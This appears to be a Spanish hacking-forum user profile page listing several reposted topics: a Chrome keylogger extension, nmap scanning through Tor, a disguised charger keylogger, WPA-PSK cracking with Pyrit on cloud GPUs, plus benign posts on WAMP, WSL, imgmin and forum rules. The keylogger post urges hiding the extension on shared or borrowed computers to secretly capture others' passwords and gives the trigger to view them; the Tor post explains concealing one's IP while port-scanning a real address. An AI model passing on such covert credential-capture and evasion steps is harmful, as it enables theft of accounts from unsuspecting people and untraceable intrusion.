Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Stiuvert

#41
Hacking / Plugin keylogger en Google Chrome
Julio 07, 2016, 08:26:34 AM

Muy buenas tardes amigos, quisiera compartirles una extensión para Google Chrome el cual es un Keylogger interno que guarda las contraseñas de todos lo inicios de sesión que se hagan en el navegador (Facebook, Twitter, Gmail, Outlook, etc.) su instalación es fácil y su uso aun mas, obviamente esta app funciona mas en computadoras que varias personas usan como bibliotecas, cybercafes o incluso en la suya si se la prestan a un amigo podrán saber sus passwords, el nombre de la extensión es Gumshoe y la pueden encontrar en la Chrome Store, pero aquí les facilitare el link para mayor comodidad. Una vez instalada la app aparecerá en la esquina del navegador pero esta se puede ocultar para que el usuario no se de cuenta que se están grabando sus sesiones, espero que les sea de utilidad y comenten si les sirvió.

Instrucciones de uso:
- Una vez instalada la extensión lo único que tienen que hacer es abrir una pestaña donde haya algún recuadro donde se inicie sesión y escribir "gselog", sin las comillas obviamente, y se abrirá una nueva pestaña donde de izquierda a derecha aparecerá la pagina donde se inicio sesión, el usuario o correo con el que se inicio sesión, su contraseña y por ultimo la hora a la que se ingreso. En la imagen se muestra como quedaría.


Link de la APP:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: lexur de indetectables
#42
Hacking / Escaneando con nmap a través de Tor
Mayo 27, 2016, 04:32:15 AM
Este tutorial muestra cómo configurar algunas herramientas en Ubuntu para hacer un escaneo de puertos Nmap a través de la red Tor.

La técnica consiste en usar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta via No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, ya que nos permite usar directamente el nodo de salida y por lo tanto nos provee mayor velocidad. Aún así, el escaneo será mucho más lento que uno normal por lo tendremos que asumir un pequeño sacrificio a cambio de "privacidad".

Esta técnica se puede utilizar en un test de intrusión, aunque evidentemente se prodiga más en atacantes malintencionados. Si se quiere conservar el anonimato hay que ser especialmente cuidadoso con las opciones especificadas en Nmap, y como veréis más adelante, se puede añadir una regla de iptables para bloquear tráfico saliente en un análisis determinado y proteger más la IP origen del tráfico.

1. Instalar tor y proxychains

Código: bash
apt-get install tor tor-geoipdb proxychains
vi /etc/tor/torrc

añade la línea "SocksPolicy accept 10.1.1.0/24"

2. Instalar tortunnel

Código: bash
apt-get install libboost-system1.40-dev libssl-dev
cd /opt/
wget http://www.thoughtcrime.org/software/tortunnel/tortunnel-0.2.tar.gz
tar xvzf tortunnel-0.2.tar.gz
cd tortunnel-0.2/
./configure
make
make install


3. Editar proxychains para que funcione con tortunnel

Código: bash
vi /etc/proxychains.conf

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
socks5 127.0.0.1 9050

4. Encontrar un nodo tor que soporte nmap

- curl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta | grep --before-context=1 'Exit Fast Running V2Dir Valid' | awk '{ print $7 }' | sed '/^$/d'

5. Usar torproxy para elegir el nodo

Código: bash
$ torproxy -n 178.73.***.** -p 9900

torproxy 0.3 by Moxie Marlinspike.
Retrieving directory listing...
Connecting to exit node: 178.73.*.*:9001
SSL Connection to node complete. Setting up circuit.
Connected to Exit Node. SOCKS proxy ready on 9900.

6. Asegurar que la IP no se muestra al objetivo añadiendo una regla en el firewall

Código: bash
iptables -A OUTPUT --dest -j DROP


7. Ejecutar el comando nmap con proxychains ** -Pn( para evitar el descubrimiento de hosts) y -sT(full Connect() para asegurarnos que todos los paquetes usan la red Tor),

Código: bash
nmap -Pn -sT -p 80,443,21,22,23 80.14.163.161


ProxyChains-3.1 (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Starting Nmap 5.36TEST4 ( No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ) at 2011-02-09 22:40 CET
|S-chain|-<>-127.0.0.1:5060-<><>-80.14.163.161:23-<--timeout |S-chain|-<>-127.0.0.1:5060-<><>-80.14.163.161:22-<--timeout |S-chain|-<>-127.0.0.1:5060-<><>-80.14.163.161:443-<--timeout |S-chain|-<>-127.0.0.1:5060-<><>-80.14.163.161:80-<><>-OK
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
|S-chain|-<>-127.0.0.1:5060-<><>-80.14.163.161:21-<--timeout
Nmap scan report for No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (80.14.163.161)
Host is up (13s latency).
PORT STATE SERVICE
21/tcp closed ftp
22/tcp closed ssh
23/tcp closed telnet
80/tcp open http
443/tcp closed https

Nmap done: 1 IP address (1 host up) scanned in 60.86 seconds

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#43
A la hora de crear una página web será necesario contar con un dominio y un servidor donde alojar los archivos de nuestra web. Si se trata de una página web muy extensa lo recomendable es intentar hacerla en un servidor de pruebas o servidor local ya que si se contrata un hosting de pago antes de comenzar a hacer la página será mucho tiempo el que perdamos hasta tenerla terminada y lista para subirla y por otro lado si utilizamos el hosting de pago para hacer la página web desde cero cometemos el riesgo de tener un mal SEO ya que a medida que avanzamos se pueden realizar muchos cambios que a futuro se convertirán en páginas 404. Es por esto que antes recomiendo utilizar un servidor local.


1. ¿Qué es un Servidor Local?

Un servidor local es simplemente un ordenador común y corriente con una serie de aplicaciones instaladas para que podamos utilizarlo de servidor de prueba y así corregir las imperfecciones y realizar los cambios necesarios en nuestra página web hasta que estemos 100% seguros de que la podemos subir por FTP y tenerla online.

Las aplicaciones necesarias para que nuestro ordenador funcione como servidor online son:

  • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Normalmente utilizamos Windows pero se puede utilizar un ordenador Mac o Linux.
  • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Es la aplicación madre que permite que el ordenador se convierta en servidor.
  • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Es una aplicación de bases de datos controlada por Apache que permite crear todas las bases de datos necesarias para nuestro proyecto.
  • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Es la tecnología de programación utilizada en el servidor.
    Todas estas aplicaciones han sido desarrolladas después del lanzamiento de Linux y son de código abierto. Pueden ser instaladas por separado cada una de ellas aunque hoy en día existe un paquete que las engloba a todas.

    Originalmente este paquete de instalación se creó bajo el nombre de LAMP (Linux, Apache, MySQL y PHP) aunque hoy en día ya se puede encontrar para Mac en MAMP y para Windows el WAMP que es del que hablaremos aquí. También existe una versión llamada XAMPP que se utiliza para Windows aunque yo personalmente me inclino por WAMP por ser más fácil de utilizar.

    2. Instalando y configurando mi Servidor Local.

    Lo primero que hay que hacer es descargar el WAMP desde su página oficial No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Tener cuidado al momento de la descarga ya que te ofrece varios paquetes de instalación dependiendo de la tecnología de tu sistema operativo (32 bit o 64 bit). Esto lo puedes ver haciendo clic derecho con el ratón sobre el ícono de Mi PC (para Windows XP) o Equipo (para Windows 7 u 8) >> Propiedades y te aparecerá una ventana donde te indicará el Tipo de Sistema que tienes instalado.


    Una vez instalado, el programa creará un ícono de acceso directo en el escritorio para que arranques el servidor cada vez que lo quieras utilizar. Al arrancar el WAMP veremos un ícono que comenzará en rojo, cambiará a naranja y finalmente se pondrá en verde para indicarnos que nuestro ordenador ya se encuentra funcionando en un servidor local.

    El icono verde indica que el WAMP está activo.

    Si hacemos click sobre este ícono veremos cómo se despliegan todas las funcionalidades del WAMP incluyendo el archivo "php.ini" que se puede configurar para que nuestras páginas web se puedan visualizar correctamente en nuestro servidor local.


    Panel de Control del WAMP.

    3. ¿Cómo comenzar a ver mi página web en mi Servidor Local?

    En el proceso de instalación del WAMP, este nos ha permitido seleccionar la ruta de instalación la cual por defecto es C:\wamp\. Esta será la ruta predeterminada en nuestro ordenador del servidor y la ruta donde se alojarán los archivos de nuestra página web será de la forma C:\wamp\www\. También es posible utilizar otra ruta pero debemos asignarla en el momento de la instalación.


    La ruta por defecto de nuestro servidor local es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o traducido No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Si tecleamos cualquiera de estas rutas en nuestro navegador podremos ver la siguiente imagen:


    Vista de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta desde donde se pueden administrar las bases de datos

    En el apartado Tools podremos ver el enlace No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que es el gestor de bases de datos del WAMP y en el apartado Your Projects veremos las carpetas creadas dentro de C:\wamp\www\ y cada una de ellas contiene una página web diferente.

    Supongamos que queremos instalar WordPress en nuestro servidor local. Lo primero que debemos hacer es crear una carpeta con el nombre wordpress dentro de nuestro servidor quedando de la forma C:\wamp\www\wordpress\. Copiamos los archivos de WordPress dentro de esta carpeta y seguidamente tecleamos en el navegador No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Podremos observar la pantalla inicial de instalación de WordPress.

    Conclusión:

    A partir de ahora ya puedes comenzar a crear tus páginas web usando un servidor local y así evitar los inconvenientes que te puede dar el crear tu página web desde cero en un servidor remoto.

    Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#44


Esa opción está disponible desde la llegada de la compilación 14316 de Windows 10, en la que aparte de otras novedades podremos comenzar a usar la consola bash de Ubuntu directamente en Windows 10.

Instala la opción en 2 minutos

En Microsoft explican el proceso de instalación de esta característica de forma clara y concisa. En primer lugar tendremos que activar el 'Developer mode' en Settings -> Update & security -> For developers.



Una vez hecho esto nos vamos a activar una nueva característica de Windows ('Turn Windows Features on or off'), y en la nueva ventana bajamos hasta ver la opción "Windows Subsystem for Linux (Beta)". Al activarla y pinchar en OK aparecerá un mensaje que nos indica que debemos reiniciar nuestro ordenador, por lo que aceptamos para proceder a ese proceso de reinicio.



Una vez de nuevo en Windows tendremos que ejecutar un Powershell y una vez dentro escribir 'bash' (sin comillas) y pulsar Enter. Al hacerlo se nos indicará que tenemos que aceptar los términos de licencia de la imagen Ubuntu proporcionada por Canonical, y si lo hacemos el sistema procederá a descargar e instalar esa imagen. Cuando termine el proceso podemos cerrar esa ventana y ya tendremos acceso a esa nueva y singular aplicación llamada "Bash on Ubuntu on Windows".

Una consola Linux en mi escritorio

Si accedemos al menú de inicio y escribimos 'bash' veremos cómo aparece el acceso a esa aplicación de escritorio. Al pinchar sobre esa herramienta aparecerá inmediatamente una nueva ventana llamada 'Bash on Ubuntu on Windows'. Lo que tendremos allí es básicamente un sistema Linux completo en nuestro escritorio Windows. Completo al menos como consola, porque no hay acceso nativo a una interfaz gráfica.



En esa consola podremos hacer bastantes cosas de las que hacemos en una terminal bash, pero el estado beta de esta nueva característica hace que no todo funcione. Nosotros comprobamos cómo es posible instalar varios paquetes comunes. Encontrarse con un acceso total al gestor de paquetes APT es fantástico, y es posible buscar paquetes (apt-cache search) o instalarlos (apt-get install) de forma realmente rápida, como también lo es actualizar la lista de paquetes y actualizar la distribución en sí.



Gracias a ello es posible acceder a todo el catálogo de software de la distribución, aunque obviamente solo podremos ejecutar de forma directa aquellas aplicaciones (y juegos) que no necesiten de una interfaz gráfica de usuario ni tener detrás un servidor de ventanas y entornos de escritorio como GNOME o KDE, por ejemplo.

En nuestras pruebas instalamos y utilizamos sin problemas aplicaciones como ssh, emacs o algunos juegos compatibles con la librería ncurses -ninvaders, nsnake- que son pruebas básicas de que es posible utilizar este tipo de soluciones directamente en la consola. Atención porque estamos usando paquetes nativos de Ubuntu, es decir, exactamente los mismos binarios ELF 64 que utilizaríamos si hubiésemos instalado la distribución Ubuntu (o cualquier otra de 64 bits) en una partición separada.



También probamos algunas herramientas algo más curiosas como el cliente de Twitter turses o navegadores web de consola como el legendario lynx en el que el aspecto de nuestra web -y de cualquier otra, claro está- no tiene mucho que ver con lo que estáis leyendo ahora. Como nos confirmaron los responsables de Microsoft, cada unidad Windows (C:, D:, E:, etc) se monta automáticamente en este sistema en subdirectorios (/mnt/c, /mnt/d, /mnt/e, etc), pero es que además tenemos acceso al sistema de ficheros de Linux desde Windows: si abrimos un explorador de archivos en la ruta "C:Users[Nombre de usuario]AppDataLocallxss" tendremos acceso a esa estructura de ficheros de nuestra singular distribución "integrada" en Windows 10.



Evidentemente estas pruebas son muy básicas y solo nos permiten comprobar que la consola que tenemos ante nosotros es funcional. Como advertían los responsables de Windows, no todo es perfecto. Existen aplicaciones que dan problemas o que directamente no se ejecutan. A nosotros nos ocurrió por ejemplo al instalar nginx -el paquete se instaló perfectamente y el servicio parecía iniciarse, pero no había nada ejecutándose realmente- o al tratar de utilizar tmux, la conocida herramienta para poder trabajar con varias sesiones del intérprete de comandos al mismo tiempo.

En realidad estos problemas son los normales de una solución que está en plena fase de desarrollo, pero es que además todo esto está pensado para poder atraer a desarrolladores del mundo Linux que quieran trabajar con sus entornos convencionales bajo un sistema Windows. Muchas de las herramientas para estos expertos ya están disponibles -el compilador gcc funciona sin problemas, por ejemplo, y en Microsoft ya nos demostraron cómo Redis y otras soluciones estaban ya soportadas- y otras están en proceso -MySQL parece dar algún que otro problema-, pero lo que está claro es que esta es solo la primera etapa de un camino mucho más largo. Uno con sorpresas como la siguiente.

Sí, es posible utilizar aplicaciones gráficas

Aunque Microsoft no habló del soporte de una interfaz gráfica de forma nativa, sí que es posible ejecutar algunas herramientas gráficas para poder comprobar que esto podría ir a mucho más en el futuro. En realidad aquí no tenemos soporte nativo, pero sí podemos hacer uso de un "truco".



Se trata de instalar algún tipo de aplicación que precisamente cree un servidor de ventanas en segundo plano al que poder dirigir esas aplicaciones gráficas. Existen varias alternativas en este sentido como Cygwin X, Vcxsrv o Xming, y en todos ellos el principio es el mismo: un servicio crea ese servidor de ventanas, a partir de lo cual podremos aprovecharlo como si tuvieramos uno real en nuestra consola bash de Ubuntu en Windows.

Lo único que quedará por hacer tras instalar uno de esos servidores -nosotros hicimos la prueba con Vcxsrv- será establecer la variable de entorno apropiada con un 'export DISPLAY=:0' (sin comillas) en la consola. Al hacerlo ya podremos instalar algunas aplicaciones básicas con un 'apt-get install x11-apps' y luego probar algunos "juguetes" clásicos como xeyes y herramientas legendarias como xedit.

Eso le anima a uno a hacer pruebas algo más ambiciosas, y por ejemplo tratamos de instalar algunas herramientas GTK como gedit e incluso un entorno ligero de ventanas como xfce. Aquí no hubo suerte, aunque puede que solo sea cuestión de tratar de solucionar algunos problemas porque es muy probable que ajustar este tipo de entornos a este escenario no sea tan complicado.

La conclusión tras estas primeras horas con la consola bash de Ubuntu en Windows 10 es que efectivamente esta puede ser una alternativa muy interesante para todos los que quieran trabajar con este sistema en modo intérprete de comandos sin salir de Windows 10. Quién lo hubiera pensado hace unos años, ¿verdad? Impresionante.





Fuente: technow
#45
Un keylogger es la manera más sencilla de obtener contraseñas y datos personales. Los hay para cualquier dispositivo que tenga teclas y para la mayoría de sistemas operativos, sobre todo para Windows y Android. El problema de seguridad es aún mayor si los keyloggers no se encuentran dentro del mismo ordenador en forma de programa o aplicación, sino conectado a la corriente, a la caza de teclados inalámbricos. Son estos dispositivos los que han puesto en alerta al FBI.

La presencia de estos dispositivos preocupa dentro del entorno empresarial, que es donde más dinero se mueve y la información es más sensible. Aun así, desde el FBI afirman que todavía no han detectado ninguno de estos positivos. Desde hace 15 meses, hay un dispositivo basado en Arduino llamado No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, que puede registrar y desencriptar las teclas pulsadas en teclados inalámbricos de Microsoft. De la existencia de estos keyloggers con apariencia de cargador sólo se lleva sabiendo desde hace 1 mes, lo cual nos hace ver que este hack ha podido ser usado durante más de un año con total impunidad. En el siguiente vídeo podemos ver cómo funciona.



Este dispositivo, creado por un hacker "de los buenos", llamado Samy Kamkar. Este hacker es conocido por descubrir curiosos y prácticos exploits. Con KeySweeper, se puede espiar, desencriptar y recoger los datos de teclados inalámbricos anteriores a 2011, año en el cual se introdujo en los teclados el estándar de seguridad y encriptación AES, o Advanced Encryption Standard. Todos los teclados previos a este año son vulnerables a este ataque. Los teclados bluetooth están protegidos ante este ataque, ya que sólo afecta a teclados que usen comunicación por radiofrecuencia 2.4GHz.

Una vez recoge los datos, tiene 2 opciones: los envía por datos móviles gracias a un chip GSM, o los recoge un segundo Keylogger que pase cerca del dispositivo. También se puede monitorear en directo. Incluso una vez desconectado de la corriente, con una pequeña batería, puede seguir funcionando durante un largo periodo, para luego volver a ser cargado una vez se enchufe a la corriente.



Cabe decir que estos cargadores son completamente funcionales, por lo que pueden ser usados sin levantar la más mínima sospecha. Cargarán más lento porque son USB de alimentación del Arduino, pero con ver que el teléfono está cargando puede hacer creer que es un simple cargador.

Fuente: adslzone
#46

Reducir drásticamente el volumen que ocupa una imagen JPEG, comprimiéndola de forma inteligente de tal forma que a simple vista no se perciba perdida de calidad. Eso lo que nos ofrece imgmin, una interesante herramienta en linea de comandos con licencia libre MIT.

Usar imgmin puede contribuir a hacer tu página web mas rápida. Quizás también mejorar los resultados de SEO –en el caso de que te importe– y hacer la experiencia de navegación de tus visitantes algo más agradable.

La mayoría de herramientas de optimización –hablamos de las que utilizan técnicas de compresión con perdida de calidad, en archivos JPEG– nos dan la opción de personalizar el nivel de compresión o bien trabajar a través de unos estándares generalmente conservadores (85 % es bastante común) de reducción de calidad de la imagen.

Un problema con esto es que los resultados pueden ser muy diferentes, habrá No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a las que se les habría podido reducir mucho más su "peso" sin que se note; mientras que con otras se nos habrá ido la mano, con una aproximación demasiado agresiva, en la que se percibe la falta de calidad respecto del original.

Imgmin viene a resolver esto al automatizar el proceso, eligiendo la reducción de calidad adecuada para que la imagen sea vea aceptable. Para ello genera No tienes permitido ver los links. Registrarse o Entrar a mi cuenta en configuraciones de calidad diferentes y posteriormente selecciona la más cercana a lo que denominan una aceptable tasa de error pixel de 1.0.

Uso de imgmin

Pero basta de teoría, vamos a ver como usar imgmin, algo que no tiene demasiado misterio:

Código: bash
imgmin original.jpg optimizada.jpg


Si se fijan en la imagen que abre el post, lo he probado en un par de fotos con resultados diferentes, en cuanto a: reducción de calidad, espacio ahorrado, tamaño o colores presentes tras la transformación.

Instalación de imgmin

En mi caso para Antergos lo instalé a partir de los repositorios comunitarios de Arch Linux (AUR):

Código: bash
yaourt -S imgmin-git


En la página de GitHub del proyecto encontraréis información para instalarlo en otras distribuciones como Ubuntu o Red Hat, así como instrucciones de compilación genéricas a partir del código fuente.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: TuxDiary
#47
Han pasado ya algunos años desde que el estándar 802.11i fue ratificado en Junio de 2004, y algunas cosas han cambiado desde aquel entonces, dando énfasis en la capacidad de computación de las máquinas. No obstante, sobre la misma línea, nada nuevo está presente en la autenticación WPA, que como ya sabemos se encuentra dividida en dos bloques:

  • WPA Enterprise Authentication: donde se utiliza el estándar 802.1x y normalmente un servidor Radius para efectuar Authentication, Authorization y Accounting (AAA).
  • WPA Personal Authentication: donde se emplea una passphrase precompartida por todos los integrantes de la red (similar a WEP).
En esta secuencia de artículos, primeramente veremos los fundamentos del ataque sobre la autenticación PSK (Pre Shared Key), también conocida como autenticación "Personal", y posteriormente lo pondremos en práctica sobre el Cloud de NIMBIX y de Amazon para extraer nuestras propias conclusiones.

Partiendo de la base de tener en posesión un handshake, sólo nos queda por dar una pequeña pincelada a la generación de la PTK (Pairwise Transient Key):


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Como podemos ver, la clave precompartida, denominada passphrase, se pasa a una función conocida como PBKDF2, utilizada en PKCS#5, conjuntamente con los siguientes parámetros:

  • El SSID y su longitud.
  • El número de iteraciones a realizar, 4096.
  • La longitud de la clave resultante, 256.
El resultado de esta función es la conocida PSK, que según la sección 5.9.2.2 del estándar 802.11i, cuando se trata de un sistema de autenticación Personal, la PMK (Pairwise Master Key) es equivalente a ésta. Posteriormente, a la PMK y al resto de atributos se les aplica un algoritmo de hash denominado HMAC-SHA1, el cual genera un conjunto de bits, conocido como PTK, que en CCMP (WPA2) tiene una longitud de 384 bits, mientras que en TKIP (WPA) una longitud de 512 bits. La PTK se divide en subclaves, donde cada una realiza una tarea específica en el proceso de establecer el cifrado de la información.

Cuando capturamos un handshake, la única parte que no podemos obtener es la PMK, por el hecho que no se transmite y que no somos capaces de generarla sin el conocimiento de la passphrase. No obstante, sí que resulta factible el conocimiento del resto de valores, los conocidos ANonce y SNonce, y las direcciones MAC del punto de acceso y la estación cliente.

Veamos la secuencia de intercambio de mensajes que se produce en el handshake de forma gráfica:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Y ahora, veamos la misma secuencia interpretada por wireshark:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En realidad, los valores ANonce y SNonce que se intercambian en el primer y el segundo mensaje, no son nada más que un par de números aleatorios generados por el punto de acceso y la estación cliente, respectivamente, los cuales permiten la generación de claves PTK de forma temporal, es decir, que para un mismo cliente y un mismo punto de acceso, con exactamente la misma configuración de SSID y passphrase, en cada nueva conexión se derivará una PTK completamente diferente. Este hecho significa que, teóricamente, no podemos descifrar las tramas de una sesión en particular aunque tengamos en posesión la passphrase correcta.

Por otro lado, en la imagen, observamos remarcado en rojo el campo "WPA Key MIC", un valor que es esencial para el ataque. Se trata de un resultado derivado de los primeros 0-128 bits de la clave PTK, los cuales representan una de las subclaves que hemos comentado anteriormente, conocida con el nombre de KCK (Key Confirmation Key). Este valor es utilizado por el punto de acceso para comprobar que la estación cliente tiene en posesión la passphrase correcta y, para realizar esta comprobación, simplemente verifica que el valor de ese campo sea igual al que es capaz de generar él mismo.

De esta forma, la esencia de todo el proceso del ataque a la clave PSK, queda representada por la siguiente imagen:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Como vemos, se ha substituido el valor inicial de Passphrase por Dictionary, del cual se extraerán una por una las distintas palabras que contenga para posteriormente generar las PSKs a través la función PBKDF2. Además, en la imagen también se ha añadido la comprobación final del valor MIC, que es necesaria para detectar la passphrase correcta, es decir, la frase de paso precompartida por todos los integrantes de la red.

Pero, en la ilustración anterior tenemos un problema, ¿Lo detectáis?

Se trata del valor de iteración 4096, que significa que para un millón de passphrases contenidas en el diccionario, se realizarán un total de 4.096 millones de iteraciones en la función PBKDF2, con lo cual se obtendrá un escaso rendimiento en el procesamiento de las mismas. De hecho, este inconveniente se detecta fácilmente cuando aplicamos Aircrack-ng:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Notamos que para una contraseña de 10 caracteres compuesta por mayúsculas y números, a la velocidad de 836 claves/segundo, se necesitan 143.000 años para comprobar todas las posibles combinaciones, una auténtica barbaridad. El motivo por el cual obtenemos este bajo rendimiento en gran parte es debido al cálculo derivado la función PBKDF2.

Por lo tanto, en este escenario debemos buscar alternativas, las cuales, principalmente, se centran en:

  • Mejorar el rendimiento de Keys/s.
  • Aplicar un ataque de diccionario dirigido.
La generación de un diccionario dirigido quedará pendiente, ya que en el siguiente post, nos centraremos en cómo mejorar el rendimiento de cómputo de claves aprovechando la gran potencia que podemos obtener de los servicios de computación del Cloud.




Este segundo artículo, de carácter más práctico, define el conjunto de herramientas a utilizar y además, se ha esquematizado para que sea un pequeño tutorial que nos permita efectuar la instalación de las mismas en las máquinas del Cloud.

Para los lectores que no desean conocer en profundidad los detalles técnicos, se recomienda obviar esta parte y saltar directamente a la tercera.

Empecemos.

Primeramente, necesitamos localizar un herramienta que sea capaz de utilizar toda la potencia de cómputo de nuestro hardware con el fin de cumplir con nuestro objetivo, que es calcular el mayor número posible de claves PSK por segundo, tal y como hemos comentado en la primera entrega. Para lograr la tarea, se propone la utilización de Pyrit.

Pyrit

Es una herramienta muy potente que permite realizar ataques a la autenticación WPA/WPA2-PSK. Destaca por tener la propiedad, a diferencia de otras herramientas, de utilizar la potencia extra de las GPUs para acelerar de forma extraordinaria el proceso de cómputo de las claves PSK. Se encuentra escrita mayormente en Python, pero también cuenta con algunos módulos escritos en C (cpyrit-cuda, cpyrit-opencl) que se encargan de permitir el uso de las tarjetas gráficas. Además, entre otras funcionalidades, nos brinda la posibilidad de crear tablas de claves PSK precomputadas.

Por otro lado, necesitamos un software intermediario que permita la interacción con las tarjetas gráficas. En este caso, se trabajará con CUDA Toolkit.

CUDA

CUDA son las siglas de Compute Unified Device Architecture (en Castellano, Arquitectura Unificada de Dispositivos de Cómputo) y hace referencia a un framework desarrollado por NVIDIA que permite a los programadores de C y C++ aprovechar la potencia del procesamiento paralelo de sus tarjetas gráficas, con el fin de proporcionar un incremento del rendimiento del sistema.

Con las dos herramientas anteriores y conjuntamente con el Cloud, ya tenemos todos los componentes necesarios. Sólo nos queda realizar la instalación de este software a una máquina remota y en el caso del panel de NIMBIX, la secuencia de pasos a realizar es la siguiente:

1) Creamos una instancia de Ubuntu 14.04 dentro de la pestaña Images:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

2) A continuación, nos vamos a la pestaña Launch y ejecutamos una máquina que cumpla con nuestras expectativas de hardware, en este caso, una instancia de dual NVIDIA M2090:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

3) Nos dirigimos a Dashboard para ver los parámetros de conexión de la máquina, y establecemos una sesión SSH:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

4) Procedemos a la instalación de CUDA Toolkit mediante la guía de instalación que nos ofrece el propio desarrollador NVIDIA, disponible en No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


Como podemos pensar, para poder operar con CUDA, debe existir el controlador de NVIDIA apropiado para el kernel que se encuentra compilado en el sistema. Normalmente, las plataformas de Cloud ya nos proporcionan esta utilidad, la cual podemos comprobar con las sentencias indicadas en la guía (las dos últimas de la imagen):

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Seguimos con la descarga de la versión de CUDA correspondiente a nuestra máquina:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Recordad que es posible utilizar directamente el comando wget sobre el enlace de Download para realizar la descarga sobre la máquina del Cloud. Una vez descargado el ejecutable, realizamos la instalación y obtendremos una salida similar a la siguiente:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Finalmente, realizamos el último paso de la instalación de CUDA, que es la modificación de las variables de entorno PATH y LD_LIBRARY_PATH, y posteriormente verificamos la versión de CUDA Toolkit que se encuentra instalada en el sistema:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

5) Una vez instalado CUDA, es el turno de Pyrit. Empezamos con él instalando las dependencias:

sudo apt-get install libpcap-dev subversion python-dev libssl-dev

Seguidamente, realizamos la descarga del código fuente:

sudo svn checkout No tienes permitido ver los links. Registrarse o Entrar a mi cuenta pyrit

Para, a continuación, efectuar su instalación:

cd pyrit/pyrit

sudo python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta install

En este instante, Pyrit debe ser capaz de listar las CPU disponibles:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Notamos que no detecta las tarjetas gráficas, debido a que aún no hemos instalado el módulo cpyrit:

cd ../cpyrit_cuda/

sudo python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta install

Una vez hecho, si volvemos a efectuar un listado de los cores disponibles, pyrit ya detecta las tarjetas de NVIDIA:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Finalmente, procedemos a lanzar una estimación de la capacidad de cómputo del hardware disponible:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En este caso, tal y como se puede observar en la imagen, sobre la configuración de nuestra máquina de NIMBIX, se ha obtenido un rendimiento total de 66324 PMKs por segundo, una diferencia importante respecto las 836 claves/s que Aircrack-ng ofrecía sobre una simple máquina virtual.

Como último paso de configuración, sólo nos queda la instalación de la herramienta Scapy, la cual Pyrit utiliza para el procesamiento de los paquetes de las capturas:

wget No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

unzip No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

cd scapy-2.3.1/

sudo python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta install

En este instante, ya tenemos el escenario preparado y por lo tanto, en el siguiente artículo lanzaremos su ejecución para analizar los resultados obtenidos, con la diferencia que la máquina de trabajo no será de NIMBIX, sino que será una máquina del Cloud de Amazon, simplemente por el hecho de que sus instancias g2.8xlarge nos ofrecen 4 GPUs en lugar de las 2 que subministran las de NIMBIX.

Espero que haya sido de vuestro agrado.

¡Saludos!

Autor: Ferran Verdés
Fuente: hacking-etico
#48
Introducción

Para un mayor orden en este subforo, se decidió renovar las normativas —y el formato mismo— para que, de esta forma, estas puedan ser más fáciles de interpretar.

Para dar inicio al tema, antes de cualquier publicación, es necesario conocer las normativas generales del foro.
Si aún no las conoce, puede hacerlo ingresando al siguiente enlace.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Es importante destacar:

  • No insultar o agredir por escrito a otro/a forero/a.
  • Los tópicos que soliciten libros con copyright serán cerrados automáticamente.
  • Evitar escribir palabras en mayúsculas.
  • Si tiene una duda resuelta, evite continuar con mas inquietudes en el mismo topic.
  • Evitar hacer spam de otros sitios/ventas/ofrecer servicios, etc.

    I. Dudas comunes.

    Antes de publicar, se ruega por favor utilizar la función de búsqueda del foro; Tal vez su duda —o una similar— ya ha sido publicada y, en vez de publicar un nuevo tema, puede darle seguimiento a un mensaje anterior. Si aún así ésta no ha sido resuelta, ya está en libertad de comenzar un nuevo tema.



    II. Dudas no éticas.

    Las dudas no éticas son, por desgracia, muy comunes en los foros de hacking y seguridad informática. Underc0de es un foro de ethical hacking, y así mismo se pide que las dudas sean éticas, es decir, sin contenido con fines ilícitos. A continuación, se listarán ciertas temáticas que realmente no tienen lugar en ethical hacking.

    — Cómo hackear un Facebook.
    — Cómo infectar a mi novia/o, sospecho que me engaña.

